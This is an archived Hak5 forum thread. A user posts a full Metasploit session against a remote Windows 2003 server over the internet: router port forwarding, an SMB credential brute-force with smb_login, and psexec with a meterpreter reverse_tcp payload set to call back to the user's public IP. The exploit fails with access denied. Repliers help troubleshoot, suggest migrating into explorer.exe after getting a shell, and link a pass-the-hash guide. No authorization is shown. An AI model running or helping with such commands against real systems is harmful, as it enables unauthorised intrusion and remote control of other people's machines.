Jump to content
Hak5 Forums

Archived

This topic is now archived and is closed to further replies.

mbarakoda

Can You Let Me Know What Is The Problem With This Exploit?

Recommended Posts

Target OS: Windows 2003 SP2 EN

Target public ip : XX.XX.XX.XX

Target Open port: 445

My OS: windows 7

My public ip : YY.YY.YY.YY

my local ip: 192.168.2.42

my router SMC

Due to the fact that the target is not on the same LAN, and the attach will be over the internet, i start with setting port forward from router settings as the following:

Name:AUTH - Protocol:TCP/UDP - WAN Port:4444 - Server Host Port:4444 - Server IP Address 192.168.2.42

I installed metasploit and start with checking if the credentials are valid or not by running scanner/smb/smb_login as following

msf> use scanner/smb/smb_login

msf auxiliary(smb_login) > set rhosts XX.XX.XX.XX

rhosts => XX.XX.XX.XX

msf auxiliary(smb_login) > set smbuser root

smbuser => root

msf auxiliary(smb_login) > set smbpass password

smbpass => password

msf auxiliary(smb_login) > run

[*] XX.XX.XX.XX:445 SMB - Starting SMB login bruteforce

[-] XX.XX.XX.XX - This system allows guest sessions with any credentials, these instances will not be reported.

[-] XX.XX.XX.XX:445 SMB - [1/3] - |WORKGROUP - FAILED LOGIN (Windows Server 2003 3790 Service Pack 2) root : (STATUS_LOGON_FAILURE)

[-] XX.XX.XX.XX:445 SMB - [2/3] - |WORKGROUP - FAILED LOGIN (Windows Server 2003 3790 Service Pack 2) root : root (STATUS_LOGON_FAILURE)

[*] Auth-User: "root"

[+] XX.XX.XX.XX:445|WORKGROUP - SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2) 'root' : 'password'

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

then after login successful, i try to use exploit/windows/smb/psexec to exploit the server by the following:

msf > use exploit/windows/smb/psexec

msf exploit(psexec) > set rhost XX.XX.XX.XX

rhost => XX.XX.XX.XX

msf exploit(psexec) > set smbuser root

smbuser => root

msf exploit(psexec) > set smbpass password

smbpass => password

msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(psexec) > set lhost YY.YY.YY.YY

lhost => YY.YY.YY.YY

msf exploit(psexec) > set lport 4444

lport => 4444

msf exploit(psexec) > exploit

[-] Handler failed to bind to YY.YY.YY.YY:4444

[*] Started reverse handler on 0.0.0.0:4444

[*] Connecting to the server...

[*] Authenticating to XX.XX.XX.XX:445|WORKGROUP as user 'root'...

[*] Uploading payload...

[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0)

but as you see the exploit failed although the credentials are valid and confirmed above, can you help me understand what's wrong on the above?

Share this post


Link to post
Share on other sites

It could be that the vulnerability is already patched.

Share this post


Link to post
Share on other sites
digip   
[-] Handler failed to bind to YY.YY.YY.YY:4444

Whats running locally already on 4444?

Also, what OS is the target? Windows, or Linux runnung SMB? User root on a windows box seems unlikely, where as I could see it on a linux machine running samba, which if you think about it, I don't think psexec works on linux as a payload, but I could be wrong..

If you got a shell popped, try migrating to a process like explorer.exe and then see where or what your commands are/can do.

Share this post


Link to post
Share on other sites

Target OS: Windows 2003 SP2 EN

Target public ip : XX.XX.XX.XX

Target Open port: 445

My OS: windows 7

My public ip : YY.YY.YY.YY

my local ip: 192.168.2.42

my router SMC

Due to the fact that the target is not on the same LAN, and the attach will be over the internet, i start with setting port forward from router settings as the following:

Name:AUTH - Protocol:TCP/UDP - WAN Port:4444 - Server Host Port:4444 - Server IP Address 192.168.2.42

I installed metasploit and start with checking if the credentials are valid or not by running scanner/smb/smb_login as following

msf> use scanner/smb/smb_login

msf auxiliary(smb_login) > set rhosts XX.XX.XX.XX

rhosts => XX.XX.XX.XX

msf auxiliary(smb_login) > set smbuser root

smbuser => root

msf auxiliary(smb_login) > set smbpass password

smbpass => password

msf auxiliary(smb_login) > run

[*] XX.XX.XX.XX:445 SMB - Starting SMB login bruteforce

[-] XX.XX.XX.XX - This system allows guest sessions with any credentials, these instances will not be reported.

[-] XX.XX.XX.XX:445 SMB - [1/3] - |WORKGROUP - FAILED LOGIN (Windows Server 2003 3790 Service Pack 2) root : (STATUS_LOGON_FAILURE)

[-] XX.XX.XX.XX:445 SMB - [2/3] - |WORKGROUP - FAILED LOGIN (Windows Server 2003 3790 Service Pack 2) root : root (STATUS_LOGON_FAILURE)

[*] Auth-User: "root"

[+] XX.XX.XX.XX:445|WORKGROUP - SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2) 'root' : 'password'

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

then after login successful, i try to use exploit/windows/smb/psexec to exploit the server by the following:

msf > use exploit/windows/smb/psexec

msf exploit(psexec) > set rhost XX.XX.XX.XX

rhost => XX.XX.XX.XX

msf exploit(psexec) > set smbuser root

smbuser => root

msf exploit(psexec) > set smbpass password

smbpass => password

msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(psexec) > set lhost YY.YY.YY.YY

lhost => YY.YY.YY.YY

msf exploit(psexec) > set lport 4444

lport => 4444

msf exploit(psexec) > exploit

[-] Handler failed to bind to YY.YY.YY.YY:4444

[*] Started reverse handler on 0.0.0.0:4444

[*] Connecting to the server...

[*] Authenticating to XX.XX.XX.XX:445|WORKGROUP as user 'root'...

[*] Uploading payload...

[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0)

but as you see the exploit failed although the credentials are valid and confirmed above, can you help me understand what's wrong on the above?

I found something related to your problem, I don't know if you have seen it or not, but here's the URL.

http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash

Share this post


Link to post
Share on other sites

  • Recently Browsing   0 members

    No registered users viewing this page.

×